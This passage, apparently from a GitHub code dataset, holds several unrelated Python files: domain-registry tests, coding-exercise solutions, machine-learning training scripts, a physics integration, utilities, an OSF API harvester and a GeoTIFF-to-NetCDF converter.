parse_domain(\"tld-doesnot.exist\")\n\n def test_successful_update_domain_registrant(self):\n \"\"\"\n Test ability to successfully update a domain with a new registrant if\n the registry has accepted our create domain request.\n \"\"\"\n epp = {\n \"name\": \"test-something.bar\",\n \"chg\": {\"registrant\": \"registrant-231\" }\n }\n with patch.object(DomainManager, 'connect_domain_to_registrant') as mock:\n domain_manager = DomainManager(self.registered_domain)\n domain_manager.update(epp)\n mock.assert_called_with(\"registrant-231\")\n\n def test_successful_update_domain_contacts(self):\n \"\"\"\n Test ability to update a domain by adding/removing contacts\n\n \"\"\"\n epp = {\n \"name\": \"test-something.bar\",\n \"rem\": {\n \"contact\": [{\"admin\": \"contact-123\"}]\n },\n \"add\": {\n \"contact\": [{\"admin\": \"contact-223\"}]\n }\n }\n domain_manager = DomainManager(self.registered_domain)\n domain_manager.update(epp)\n new_admin_contact = self.registered_domain.contacts.filter(\n active=True,\n contact__registry_id=\"contact-223\",\n contact_type__name=\"admin\"\n )\n self.assertTrue(new_admin_contact.exists(),\n \"New contact was added to domain\")\n old_admin_contact = self.registered_domain.contacts.filter(\n active=True,\n contact__registry_id=\"contact-123\",\n contact_type__name=\"admin\"\n )\n self.assertFalse(old_admin_contact.exists(),\n \"Old contact removed\")\n","repo_name":"heytrav/drs-api","sub_path":"domain_api/tests/test_entity_management.py","file_name":"test_entity_management.py","file_ext":"py","file_size_in_byte":7092,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"3155056000","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'isValid' function below.\n#\n# The function is expected to return a STRING.\n# The function accepts STRING s as parameter.\n#\n\ndef isValid(s):\n # Write your code here\n str_dict = dict()\n for letter in s:\n str_dict.setdefault(letter, 0)\n str_dict[letter] += 1\n \n values = []\n for 
value in str_dict.values():\n values.append(value)\n \n if min(values) == max(values):\n return 'YES'\n else:\n if min(values) == 1 and values.count(1) == 1:\n if values.count(max(values)) == len(values) - 1:\n return 'YES'\n for i in range(len(values)):\n if values[i] == max(values):\n values[i] -= 1\n break\n if min(values) == max(values):\n return 'YES'\n return 'NO'\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n s = input()\n\n result = isValid(s)\n\n fptr.write(result + '\\n')\n\n fptr.close()\n","repo_name":"IgnatIvanov/HackerRank","sub_path":"3 Months Preparation Kit/Week 07/Sherlock and the Valid String/Sherlock and the Valid String.py","file_name":"Sherlock and the Valid String.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13361037056","text":"from locale import strcoll\nimport os.path as osp\n\nimport torch\nimport torch.nn.functional as F\nfrom torch.nn import GRU, Linear, ReLU, Sequential\n\nimport torch_geometric.transforms as T\nfrom torch_geometric.datasets import ModelNet\nfrom torch_geometric.loader import DataLoader\nfrom torch_geometric.nn import NNConv, Set2Set,GCNConv,GIN,GatedGraphConv\nfrom torch_geometric.utils import remove_self_loops\nfrom Data_MP_MOL import MP_ESOL,MP_OGBHIV,MP_OGBPCBA,MP_Lipo\nfrom Data_MPZINC import MP_ZINC\nfrom Data_MPQM9 import MP_QM9\nfrom models import MPMol\nimport sys\nimport argparse\nparser=argparse.ArgumentParser()\nparser.add_argument('--dataset',default='qm9',type=str)\nparser.add_argument('--t',default=0,type=int)\nparser.add_argument('--dim',type=int,default=64)\nparser.add_argument('--epoch',default=2,type=int)\nparser.add_argument('--o',type=str,default='runs')\nparser.add_argument('--model',default='mpmol')\nparser.add_argument('--gpu',default='0',type=str)\nparser.add_argument('--recurs',defualt=3,type=int)\nparser.add_argument('--nheads',type=int,default=8)\nparser.add_argument('--dropout',type=float,default=0.5)\nargs=parser.parse_args()\ntarget = args.t\ndim = args.dim\n\nclass MyTransform(object):\n def __call__(self, data):\n data.y = data.y[:, target]\n return data\n\nclass Complete(object):\n def __call__(self, data):\n device = data.edge_index.device\n\n row = torch.arange(data.num_nodes, dtype=torch.long, device=device)\n col = torch.arange(data.num_nodes, dtype=torch.long, device=device)\n\n row = row.view(-1, 1).repeat(1, data.num_nodes).view(-1)\n col = col.repeat(data.num_nodes)\n edge_index = torch.stack([row, col], dim=0)\n\n edge_attr = None\n if data.edge_attr is not None:\n idx = data.edge_index[0] * data.num_nodes + data.edge_index[1]\n size = list(data.edge_attr.size())\n size[0] = data.num_nodes * data.num_nodes\n edge_attr = data.edge_attr.new_zeros(size)\n edge_attr[idx] = data.edge_attr\n\n edge_index, edge_attr = remove_self_loops(edge_index, edge_attr)\n data.edge_attr = edge_attr\n data.edge_index = edge_index\n\n return data\n\nif args.dataset.lower()=='qm9':\n path ='dataset/QM9'\n transform = T.Compose([MyTransform(), Complete(), T.Distance(norm=False)])\n dataset = MP_QM9(path, transform=transform).shuffle()\nelif args.dataset.lower()=='zinc':\n path ='dataset/zinc_origin'\n transform = T.Compose([MyTransform(), Complete(), T.Distance(norm=False)])\n dataset = MP_ZINC(path, transform=transform).shuffle()\nelif args.dataset.lower()=='mutag':\n path='dataset/MUTAG'\n transform = T.Compose([MyTransform(), Complete(), T.Distance(norm=False)])\n dataset = 
ModelNet(path,'MUTAG', transform=transform).shuffle()\nelif args.dataset.lower()=='nci':\n path='dataset/NCI1'\n transform = T.Compose([MyTransform(), Complete(), T.Distance(norm=False)])\n dataset = ModelNet(path,'nci', transform=transform).shuffle()\nelif args.dataset.lower()=='ptc':\n path='dataset/PTC_FR'\n transform = T.Compose([MyTransform(), Complete(), T.Distance(norm=False)])\n dataset = ModelNet(path,'ptc', transform=transform).shuffle()\nelif args.dataset.lower()=='hiv':\n path='dataset/hiv'\n transform = T.Compose([MyTransform(), Complete(), T.Distance(norm=False)])\n dataset = MP_OGBHIV(path,'ptc', transform=transform).shuffle()\nelif args.dataset.lower()=='pcba':\n path='dataset/pcba'\n transform = T.Compose([MyTransform(), Complete(), T.Distance(norm=False)])\n dataset = MP_OGBPCBA(path,'ptc', transform=transform).shuffle()\n\n\n\nmean = dataset.data.y.mean(dim=0, keepdim=True)\nstd = dataset.data.y.std(dim=0, keepdim=True)\ndataset.data.y = (dataset.data.y - mean) / std\nmean, std = mean[:, target].item(), std[:, target].item()\nl_data=len(dataset.data)\n\ntest_dataset = dataset[:int(l_data*0.1)]\nval_dataset = dataset[int(l_data*0.1):int(l_data*0.2)]\ntrain_dataset = dataset[int(l_data*0.2):]\ntest_loader = DataLoader(test_dataset, batch_size=128, shuffle=False)\nval_loader = DataLoader(val_dataset, batch_size=128, shuffle=False)\ntrain_loader = DataLoader(train_dataset, batch_size=128, shuffle=True)\n\n\nif torch.cuda.is_available() and args.gpu!='cpu':\n device='cuda:'+args.gpu\nelse:\n device='cpu'\ndevice=torch.device(device)\nif args.model.lower()=='mpmol':\n model=model = MPMol(infeat=dataset.node_dim, dim=args.hidden, edge_dim=dataset.edge_dim, nheads=args.nheads, dropout=args.dropout, recurs=args.recurs)\n\n\noptimizer = torch.optim.Adam(model.parameters(), lr=0.001)\nscheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min',\n factor=0.7, patience=5,\n min_lr=0.00001)\n\n\ndef train():\n model.train()\n loss_all = 0\n for data in train_loader:\n data = data.to(device)\n optimizer.zero_grad()\n loss = F.mse_loss(model(data), data.y)\n loss.backward()\n loss_all += loss.item() * data.num_graphs\n optimizer.step()\n return loss_all / len(train_loader.dataset)\n\n\ndef test(loader):\n model.eval()\n absolute_error = 0\n std_error=0\n for data in loader:\n data = data.to(device)\n stand_y_pred=model(data)\n absolute_error += (stand_y_pred * std - data.y * std).abs().sum().item() # MAE\n\n std_error+=(stand_y_pred-data.y).abs().sum().item()\n return absolute_error / len(loader.dataset),std_error/ len(loader.dataset)\n\nbest_val_error = None\nsave_name='|%s|target%d|ep%d|dim%d|'%(args.model,args.t,args.epoch,args.dim)\noutfile=open(osp.join(args.o,save_name+'.txt'),'w')\nprint('mean:%.4f,std:%.4f'%(mean,std),file=outfile,end='\\n')\nfor epoch in range(1, args.epoch):\n lr = scheduler.optimizer.param_groups[0]['lr']\n loss = train(epoch)\n val_error,_ = test(val_loader)\n scheduler.step(val_error)\n if best_val_error is None or val_error <= best_val_error:\n test_mae,test_stdmae = test(test_loader)\n best_val_error = val_error\n prt=f'Epoch: {epoch:03d}, LR: {lr:7f}, Loss: {loss:.7f}, '+f'Val MAE: {val_error:.7f}, Test MAE: {test_mae:.7f}, Test stdMAE: {test_stdmae:.7f}'\n print(prt,file=outfile,end='\\n')\n 
print(prt)\noutfile.close()\nsave_path=osp.join('save_model','checkpoint_'+save_name)\ntorch.save(model,save_path+'.pt')","repo_name":"valerieJJ/MPMol","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6388,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"23874159524","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 13 12:25:16 2019\n\n@author: usuario\n\nejemplo del pipline y por que sirve:\n https://dreisbach.us/articles/building-scikit-learn-compatible-transformers/\n \notras formas de hacerlo:\n https://towardsdatascience.com/a-simple-example-of-pipeline-in-machine-learning-with-scikit-learn-e726ffbb6976\n https://github.com/suvoooo/Machine_Learning/blob/master/pipelineWine.py\n\nAyuda:\n https://stackoverflow.com/questions/50965004/sklearn-custom-transformers-difference-between-using-functiontransformer-and-su\n \n\"\"\"\n\n\n#importo\nimport pandas as pd\nimport networkx as nx\nimport numpy as np\n\nimport grafos_funciones_paquete as gfp #tiene funciones\nimport grafos_funciones_paquete_V2 as gfp2 #tiene transformers\n\n\n#data de ejemplo\nnum_nodos = 200\nnum_aristas = 350\nG = nx.gnm_random_graph(num_nodos , num_aristas) \nf = pd.DataFrame(data = {'name': range(num_nodos),\n 'col1': np.random.rand(num_nodos), \n 'col2': np.random.rand(num_nodos) > 0.5})\n\n#nx.draw(G)\n\nprint(f.head())\nf = gfp.betweenness(G,f)\nf = gfp.pagerank(G,f)\nf = gfp.communities_label_propagation(G,f)\nprint(f.head())\nf[\"target\"] = [1 if i >0.005 else 0 for i in f.pagerank]\n\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import RandomizedSearchCV\n\n\nX=f.drop(['target'],axis=1)\nY=f['target']\n\n#++++++++++++++++++++++++++++++++\n# create the pipeline object\n#++++++++++++++++++++++++++++++++\nDumb = gfp2.Dumb(5)\nReplace1 = gfp2.Replace(np.nan,-1)\nReplace2 = gfp2.Replace(np.inf,-1)\nDegree = gfp2.Degree(G)\nDropName = gfp2.DropName()\nBetweenness = gfp2.Betweenness(G)\nPagerank = gfp2.Pagerank(G)\nClustering = gfp2.Clustering(G)\nCentrality = gfp2.Centrality(G)\nCommunities_label_propagation = gfp2.Communities_label_propagation(G)\nCommunities_greedy_modularity = gfp2.Communities_greedy_modularity(G)\nMean_neighbors = gfp2.Mean_neighbors(G, \"col1\", 1)\nStd_neighbors = gfp2.Std_neighbors(G, \"col1\", 1)\nMax_neighbors = gfp2.Max_neighbors(G, \"col1\", 1)\nMin_neighbors = gfp2.Min_neighbors(G, \"col1\", 1)\nParticipation_coefficient = gfp2.Participation_coefficient(G, \"communities_label_propagation\")\nWithin_module_degree = gfp2.Within_module_degree(G, \"communities_label_propagation\")\nNode_embeddings = gfp2.Node_embeddings(G)\n\n\ndef aux_f1(G):\n return [0 for i in G.nodes()]\n\ndef aux_f2(G, X):\n return [0 for i in G.nodes()]\n\nGraph_fuction = gfp2.Graph_fuction(G, aux_f1)\nGraph_features_fuction = gfp2.Graph_features_fuction(G, aux_f2)\n\nsteps = [#(\"nioqui\", Dumb), (\"Degree\", Degree), (\"Degree2\", Degree), \n #(\"Betweenness\", Betweenness), (\"Pagerank\", Pagerank), (\"Centrality\", Centrality), \n #(\"CLP\", Communities_label_propagation), (\"CGM\", Communities_greedy_modularity),\n #(\"mean\", Mean_neighbors), (\"std\", Std_neighbors), (\"max\", Max_neighbors), (\"min\", Min_neighbors), \n #(\"PC\", Participation_coefficient), (\"WMD\", Within_module_degree), \n #(\"embeddings\", Node_embeddings), \n 
#(\"Graph_fuction\", Graph_fuction), (\"Graph_features_fuction\", Graph_features_fuction)\n (\"Clustering\", Clustering),\n (\"DropName\", DropName), (\"FillNans\", Replace1), (\"FillInf\", Replace2), \n ('scaler', StandardScaler()), ('SVM', SVC())]\n\npipeline = Pipeline(steps)\n\n\n#++++++++++++++++++++++++++++++++++++++\n#+ create the hyperparameter space\n#++++++++++++++++++++++++++++++++++++++\n\nparameteres = {'SVM__C':[0.001,0.1,10,100,10e5], 'SVM__gamma':[0.1,0.01]}\n\n#++++++++++++++++++++++++++++++++++++\n#+ create train and test sets\n#++++++++++++++++++++++++++++++++++++\n\nX_train, X_test, y_train, y_test = train_test_split(X,Y,test_size=0.2, random_state=30, stratify=Y)\n\n#print X_test.shape\n\n#++++++++++++++++++++++++++++++\n#+ Grid Search Cross Validation\n#++++++++++++++++++++++++++++++\ngrid = RandomizedSearchCV(pipeline, param_distributions = parameteres, cv=5, n_iter = 2)\n\ngrid.fit(X_train, y_train)\n\nprint('score: ', grid.score(X_test,y_test)) \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"EquisGBustos/-scikit-graph","sub_path":"grafos_funciones_paquete_probando_V2.py","file_name":"grafos_funciones_paquete_probando_V2.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"456741129","text":"data = input()\ncount_zero = 0 # 전부 0으로 바꾸는 경우\ncount_one = 0 # 전부 1로 바꾸는 경우\n\nif data[0] == '1': # 0을 1로 바꾸는 경우\n count_one += 1\nelse: # 1을 0으로 바꾸는 경우\n count_zero += 1\n\nfor i in range(len(data)-1): # 원소를 확인하면서\n if data[i] != data[i+1]:\n if data[i+1] == '1': # 1로 바뀌는 경우\n count_one += 1\n else: # 0으로 바뀌는 경우\n count_zero += 1\n\nprint(min(count_zero,count_one))","repo_name":"ljseok/GreedyAlgorithm","sub_path":"문자열 뒤바꾸기.py","file_name":"문자열 뒤바꾸기.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43048016932","text":"'''\nGiven a binary tree, flatten it to a linked list in-place.\n'''\n#\n# @lc app=leetcode id=114 lang=python3\n#\n# [114] Flatten Binary Tree to Linked List\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\n\nclass Solution:\n def flatten(self, root: TreeNode) -> None:\n \"\"\"\n Do not return anything, modify root in-place instead.\n \"\"\"\n if root == None:\n return root\n\n self.recursive(root)\n\n def recursive(self, root):\n if root.left == None and root.right == None:\n return root\n\n left_tail = None\n right_tail = None\n\n if root.left:\n left_tail = self.recursive(root.left)\n\n if root.right:\n right_tail = self.recursive(root.right)\n\n if left_tail:\n left_tail.right = root.right\n root.right = root.left\n root.left = None\n\n return right_tail if right_tail != None else left_tail\n\n\n# @lc code=end\n","repo_name":"joyceyu6/coding_courses","sub_path":"2021_4_19_to372/Binary Tree_114.flatten-binary-tree-to-linked-list.py","file_name":"Binary Tree_114.flatten-binary-tree-to-linked-list.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6827296053","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom integrate import *\n\n\ndef calc_capacity(T, num=50):\n # constants in the problem\n # volume of solid\n V = 1000 / 1e6\n # density o atoms\n rho = 6.022e28\n # boltzmann's constant\n k_b 
= 1.3906e-23\n # debye temperature\n theta_d = 428\n\n def integrand(x):\n return x ** 4 * np.exp(x) / ((np.exp(x) - 1) ** 2)\n\n result = simpson_integrate(integrand, 0+1e-9, theta_d / T, num_of_int=num)\n result = 9 * V * rho * k_b * (T / theta_d) ** 3 * result\n\n return result\n\n\ntry:\n t = np.linspace(0, 500, 10000)\n cap = [calc_capacity(val) for val in t]\nexcept RuntimeError:\n pass\n\nplt.figure()\nplt.title('Debye model')\nplt.plot(t, cap, label='Aluminium')\nplt.legend()\nplt.xlabel(r'$T / $' + 'K')\nplt.ylabel(r'$C_v / $' + '$($' + 'J/K' + '$^{-1})$')\nplt.grid()\nplt.show()\n\nexit()\n\n","repo_name":"Jokiva/Computational-Physics","sub_path":"lecture 10/Problem 1.py","file_name":"Problem 1.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"16431725692","text":"import pickle\nimport time\nimport torch.nn.functional as F\nimport numpy as np\nimport ot\nimport random\nfrom math import cos, sin, pi\nimport torch\n\n\n\ndef angle_vector(angle):\n\n return [cos(angle*pi/ 180), sin(angle*pi/ 180)]\ndef getArotateM(angle): # 得到一个旋转矩阵(二维的)\n\n angle_pi = angle*pi/ 180\n return [[cos(angle_pi), -sin(angle_pi)],\n [sin(angle_pi), cos(angle_pi)]]\n\n\ndef load_smiles(filename):\n with open(filename) as f:\n a = [line.strip('\\n') for line in f]\n return a\n\n\ndef batchi_replace(tensor, percent, value, min_max ):\n shape = tensor.shape\n num_dim = len(shape)\n num_points = int(torch.prod(torch.tensor(shape))*percent)\n \n points = torch.zeros(num_points,num_dim).int()\n \n for index, d in enumerate(shape):\n points[:,index] = torch.tensor(np.random.choice(range(d), num_points))\n \n tensor[[p for p in points.T]] = value\n \n return tensor\n\n\n\ndef compute_distances(P, C):\n \"\"\"\n \n \"\"\"\n A = (P**2).sum(axis=1, keepdims=True) #先对P求平方;然后按行求和,并且保持维度。得到一个5行1列的向量。\n \n B = (C**2).sum(axis=1, keepdims=True).T #得到一个1行4列的向量。\n \n return np.sqrt(A + B - 2* np.dot(P, C.T)) #A+B会广播运算加法。np.dot()是矩阵相乘。\n \n# if __name__ == \"__main__\":\n# P = np.random.randint(1, 5, (5, 3)) #5行3列。5个三维向量。\n# C = np.random.randint(1, 5, (4, 3)) #4行3列。4个三维向量。\n# dist = compute_distances(P, C)\n \n# print(P)\n# print(C)\n# print(dist)\n\n\n\ndef reorder(a_point,b_point):\n \"\"\"\n \"\"\"\n len_a = len(a_point) \n len_b = len(b_point)\n dis_M = compute_distances(a_point,b_point)\n aw , bw = np.ones(len_a), np.ones(len_b)\n orderM = ot.emd(aw, bw, dis_M)\n b_point_od = np.matmul(orderM,b_point)\n \n return a_point,b_point_od, orderM\n \n\n# 模型保存\ndef model_save(model,Train_loss_value\n ,Train_loss_sig\n ,Train_loss\n ,Val_loss_value\n ,Val_loss_sig\n ,Val_loss):\n time_s = time.strftime(\"%Y-%m-%d_%Hh%Mm%Ss\", time.localtime())\n torch.save({'epoch': len(Train_loss),\n 'model': model.state_dict(),\n 'model_optimizer': optimizer.state_dict(),\n\n \"Train_loss_value\": Train_loss_value,\n \"Train_loss_sig\": Train_loss_sig,\n \"Train_loss\": Train_loss,\n \"Val_loss_value\": Val_loss_value,\n \"Val_loss_sig\": Val_loss_sig,\n \"Val_loss\": Val_loss,\n }, \n 'model_save/model_save_main_drugs_all_{}.pth'.format(time_s))\n print(f'Epoch {len(Train_loss)} - Saved Model')\n\ndef repeat_tensor_by_numlist(tensor, numlist):\n \"\"\"\n \n \"\"\"\n shape = tensor.shape\n\n tensor_list = []\n for i, num_confs in enumerate(numlist):\n wqe = torch.ones([len(shape)])\n wqe[0] = num_confs\n wqe = tuple(wqe.int().cpu().numpy().tolist())\n tensor_i = tensor[i].unsqueeze(0).repeat(wqe)\n tensor_list.append(tensor_i)\n\n tensor_n 
= torch.cat(tensor_list, dim=0)\n\n return tensor_n \n\n\ndef repeat_list_by_numlist(list_, numlist):\n list_new = []\n [list_new.extend([list_[i]]*numlist[i]) for i in range(len(list_))]\n return list_new\n\ndef group_by_num(list_, numlist):\n \"\"\"\n \n \"\"\"\n group_list = []\n len_ = len(numlist)\n for i in range(len_):\n groupi = list_[:numlist[i]]\n list_ = list_[numlist[i]:]\n \n group_list.append(groupi)\n \n return group_list\n\n\n\ndef pad_list(x,lengh,value):\n return x + [value for i in range(lengh - len(x))]\n\n\nclass pickle_:\n def save(file_name, var):\n if file_name[-4:] != \".pkl\":\n file_name+=\".pkl\"\n with open(file_name,\"wb\") as pf:\n pickle.dump(var, pf)\n print (time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n print(f\"save_to_{file_name}\")\n def load(file_name):\n with open(file_name,\"rb\") as pf:\n unk = pickle.load(pf)\n return unk\n \n \n \n# --------------------------------------------------------------- \ndef get_intersection_tensor(tensor, toshape):\n intersection_shape = []\n for i in range(len(tensor.shape)):\n if tensor.shape[i] - toshape[i]>=0:\n intersection_shape.append(toshape[i])\n\n else:\n intersection_shape.append(tensor.shape[i])\n\n return tensor[: intersection_shape[0], : intersection_shape[1], : intersection_shape[2], : intersection_shape[3]]\n\n\ndef get_pad_tensor(tensor, toshape, value=0):\n pad_list = []\n for i in range(1, len(tensor.shape)+1):\n i = -i\n if toshape[i] - tensor.shape[i]==0:\n pad_list.extend([0,0])\n \n elif toshape[i] - tensor.shape[i]>0:\n pad_list.extend([0,toshape[i] - tensor.shape[i]]) \n \n else:\n raise ValueError\n \n pad_tensor = F.pad(tensor, pad_list,\"constant\", value=value)\n return pad_tensor\n\ndef my_reshape_func(tensor, toshape, pad_value=0):\n \n \n intersection_tensor = get_intersection_tensor(tensor, toshape)\n pad_tensor = get_pad_tensor(intersection_tensor, toshape, value=pad_value)\n return pad_tensor\n\n# tensor = torch.rand([3,3,2,6])\n# toshape = (4,6,2,3)\n# reshape_tensor = my_reshape_func(tensor, toshape, pad_value=0)\n# tensor.shape, reshape_tensor.shape\n\n# ========================================================================\n\n\n\n\ndef info(tensor):\n return tensor.shape, tensor.min(), tensor.max()\n\n\n\ndef save_list(list_, file_path):\n f = open(file_path, \"w\")\n\n for i in list_:\n f.write(i + \"\\n\")\n f.close()\n \ndef load_list(file_path):\n with open(file_path, \"r\") as f:\n list_ = [line.strip('\\n') for line in f]\n return list_\n \n \ndef get_idxs_bylist(list1, list2):\n \"\"\"\n \"\"\"\n idxs = []\n for i in list1:\n try:\n idx = list2.index(i)\n idxs.append(idx)\n except ValueError as e:\n continue \n return idxs ","repo_name":"zimeizhng/Tora3D","sub_path":"utils_base.py","file_name":"utils_base.py","file_ext":"py","file_size_in_byte":6177,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"21427494322","text":"import logging\nfrom typing import Tuple\nfrom typing import Union\nfrom typing import Iterator\n\nimport arrow\nfrom furl import furl\n\nfrom share.harvest.harvester import Harvester\n\nlogger = logging.getLogger(__name__)\n\n\nclass OSFHarvester(Harvester):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.url = 'https://api.osf.io/v2/nodes/'\n\n def do_harvest(self, start_date: arrow.Arrow, end_date: arrow.Arrow) -> Iterator[Tuple[str, Union[str, dict, bytes]]]:\n\n url = furl(self.url)\n\n url.args['page[size]'] = 100\n url.args['filter[public]'] = 
'true'\n url.args['embed'] = 'affiliated_institutions'\n url.args['filter[date_modified][gt]'] = start_date.date().isoformat()\n url.args['filter[date_modified][lt]'] = end_date.date().isoformat()\n\n return self.fetch_records(url)\n\n def fetch_records(self, url: furl) -> Iterator[Tuple[str, Union[str, dict, bytes]]]:\n records, next_page = self.fetch_page(url)\n total_records = records.json()['links']['meta']['total']\n\n total_harvested = 0\n while True:\n for record in records.json()['data']:\n\n # iterate the linked contributors data in a new key in the record\n contributor_url = furl(record['relationships']['contributors']['links']['related']['href'])\n contributor_url.args['page[size]'] = 100\n contributor_records, next_contributor_page = self.fetch_page(contributor_url)\n total_contributors = contributor_records.json()['links']['meta']['total']\n contributor_data = []\n while True:\n contributor_data = contributor_data + contributor_records.json()['data']\n if not next_contributor_page:\n break\n contributor_records, next_contributor_page = self.fetch_page(next_contributor_page)\n logger.info('Had {} contributors to harvest, harvested {}'.format(total_contributors, len(contributor_data)))\n record['contributors'] = contributor_data\n\n # gather the the rest of the record\n total_harvested += 1\n yield (record['id'], record)\n\n if not next_page:\n break\n records, next_page = self.fetch_page(next_page)\n\n logger.info('Had {} records to harvest, harvested {}'.format(total_records, total_harvested))\n\n def fetch_page(self, url: furl, next_page: str=None) -> (list, str):\n logger.info('Making request to {}'.format(url.url))\n\n records = self.requests.get(url.url)\n next_page = records.json()['links'].get('next')\n next_page = furl(next_page) if next_page else None\n\n logger.info('Found {} records.'.format(len(records.json()['data'])))\n\n return records, next_page\n","repo_name":"pattisdr/SHARE","sub_path":"providers/io/osf/harvester.py","file_name":"harvester.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"41870152013","text":"from os import path\nimport sys\n\nimport click\nimport xarray as xr\n\nfrom mapshader.transforms import cast\nfrom mapshader.transforms import flip_coords\nfrom mapshader.transforms import orient_array\nfrom mapshader.transforms import reproject_raster\nfrom mapshader.transforms import squeeze\n\n\n@click.command(\n no_args_is_help=True,\n context_settings=dict(help_option_names=['-h', '--help']),\n short_help='Convert GeoTIFF raster file format into a NetCDF file.',\n help=(\n 'Convert GeoTIFF raster file format into a NetCDF file '\n 'given the `FILEPATH` relative path.'\n ),\n)\n@click.argument(\n 'filepath',\n type=str,\n required=True,\n)\n@click.option(\n '--x',\n type=str,\n default='x',\n show_default=True,\n help='The x dimension name.',\n)\n@click.option(\n '--y',\n type=str,\n default='y',\n show_default=True,\n help='The y dimension name.',\n)\n@click.option(\n '--chunks',\n type=tuple,\n default=(512, 512),\n show_default=True,\n help='Coerce into dask arrays with the given chunks.',\n)\n@click.option(\n '--data_variable',\n type=str,\n default='data',\n show_default=True,\n help='The data variable name.',\n)\n@click.option(\n '--fill_na',\n type=int,\n default=-9999,\n show_default=True,\n help='Fill NaN values with the given value.',\n)\n@click.option(\n '-c',\n '--cast',\n 'dtype',\n default='int16',\n show_default=True,\n help='Cast the data to 
the given type.',\n)\n@click.option(\n '-r',\n '--reproject',\n 'crs',\n type=int,\n default=3857,\n show_default=True,\n help='Reproject the data to the given CRS.',\n)\ndef tif_to_netcdf(\n filepath,\n x,\n y,\n chunks,\n data_variable,\n fill_na,\n dtype,\n crs,\n):\n '''\n Convert GeoTIFF raster file format into a NetCDF file given the\n `FILEPATH` relative path.\n\n Parameters\n ----------\n filepath : str\n GeoTIFF raster file relative path.\n x : str\n The x dimension name.\n y : str\n The y dimension name.\n chunks : tuple of int\n The dask array chunk size for the x and y dimension.\n data_variable : str\n The data variable name.\n fill_na : int or float\n Fill NaN values with the given value.\n dtype : str\n Cast the data to the given type.\n crs : int\n Reproject the data to the given CRS.\n '''\n input_file = path.abspath(path.expanduser(filepath))\n output_file = input_file.replace('.tif', '.nc')\n\n print(\n 'Converting {0} from GeoTIFF to NetCDF file'.format(input_file),\n file=sys.stdout,\n )\n\n arr = xr.open_rasterio(input_file)\n\n # Check if the given dimensions exist\n for dimension in (x, y):\n if dimension not in arr.dims:\n raise click.BadParameter(\n \"The dimension name {} doesn't exist.\".format(dimension)\n )\n\n arr = squeeze(arr, [d for d in arr.dims if d != x and d != y])\n arr = cast(arr, dtype=dtype)\n arr = orient_array(arr)\n arr = flip_coords(arr, dim=y)\n arr = reproject_raster(arr, epsg=crs)\n\n dataset = xr.Dataset(\n data_vars={data_variable: (['y', 'x'], arr.chunk(chunks).data)},\n coords={'x': arr.coords[x], 'y': arr.coords[y]},\n )\n dataset.attrs = dict(name=data_variable)\n dataset.to_netcdf(\n path=output_file,\n encoding={data_variable: {'_FillValue': fill_na}},\n )\n\n print(\n 'Conversion complete: {0}'.format(output_file),\n file=sys.stdout,\n )\n","repo_name":"makepath/mapshader","sub_path":"mapshader/commands/tif_to_netcdf.py","file_name":"tif_to_netcdf.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"3"} +{"seq_id":"20052742833","text":"import pandas as pd\n\n\nexeption_cat = {\n \"Neuroanatomy Other\": \"Neuroanatomy, Physiology, Metabolism and Neurotransmission Other\",\n \"Informatics Other\": \"Neuroinformatics and Data Sharing Other\",\n \"Emotion and Motivation Other\": \"Emotion, Motivation and Social Neuroscience Other\",\n \"Non-Invasive Stimulation Methods Other\": \"Non-Invasive Methods Other\",\n \"Invasive Stimulation Methods Other\": \"Invasive Methods Other\",\n \"Perception and Attention Other\": \"Perception, Attention and Motor Behavior Other\",\n \"Other Methods\": \"Modeling and Analysis Methods Other\",\n \"Social Neuroscience Other\": \"Emotion, Motivation and Social Neuroscience Other\",\n}\n\n\ndef add_urls(df_abstract, df_raw):\n \"\"\"Add associated pdf and video link to abstract\"\"\"\n df_abstract[\"pdf\"] = None\n # df_abstract[\"video\"] = None\n df_abstract = df_abstract.set_index(\"submissionNumber\")\n df_raw = df_raw.set_index(\"submissionNumber\")\n media_links = pd.read_csv(\"data/ohbm-ALL-poster-links.csv\")\n media_links[\"Title\"] = media_links[\"Title\"].apply(str.lower)\n\n for idx, row in df_abstract.iterrows():\n if str(idx) in df_raw.index:\n speakers = df_raw.loc[str(idx), \"speakers\"][\"speaker\"]\n email = speakers[0][\"email\"]\n title = str.lower(row[\"title\"])\n # filter out people with more than one first author paper\n mask = 